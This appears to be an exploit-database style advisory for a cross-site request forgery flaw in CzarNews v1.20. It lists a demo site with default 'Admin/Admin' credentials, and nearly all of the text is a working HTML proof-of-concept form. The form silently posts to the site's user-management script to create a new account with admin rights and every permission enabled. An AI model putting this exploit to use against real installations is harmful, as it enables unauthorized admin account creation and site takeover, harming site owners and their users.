< ------------------- header data start ------------------- >


#############################################################

# Application Name : CzarNews v1.20

# Vulnerable Type : XSRF

# Infection : Add User

# author : BARCOD3 - Bug Researchers

# Demo : http://www.czaries.net/scripts/czarnews/

username; Admin
password ; Admin

# Home : ozkanbozkurt.com
#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form method=post action=http://www.czaries.net/scripts/czarnews/cn_users.php name=theform>
<input type=text name=user size=25 class=input value=username>
<input type=password name=pass size=25 class=input value=passWORD>
<input type=text name=email size=35 class=input value=EMAIL>
<input type=radio name=allcats value=all id=allcats CHECKED>
<input type=radio name=allcats value=sel id=selcats>
<option value=327 CHECKED>Sports
<input type=radio name=admin value=on id=adminon CHECKED>
<input type=radio name=admin value=off id=adminoff CHECKED>
<input type=checkbox name=news id=news CHECKED>
<input type=checkbox name=images id=images CHECKED>
<input type=checkbox name=users id=users CHECKED>
<input type=checkbox name=categories id=cats CHECKED>
<input type=checkbox name=config id=config CHECKED>
<input type=checkbox name=words id=words CHECKED>
<input type=hidden name=op value=add>
<input type=hidden name=id value=>
<input type=hidden name=go value=true>
<input type=submit name=submit value=Add User class=input>
</form>
< -- bug code end of -- >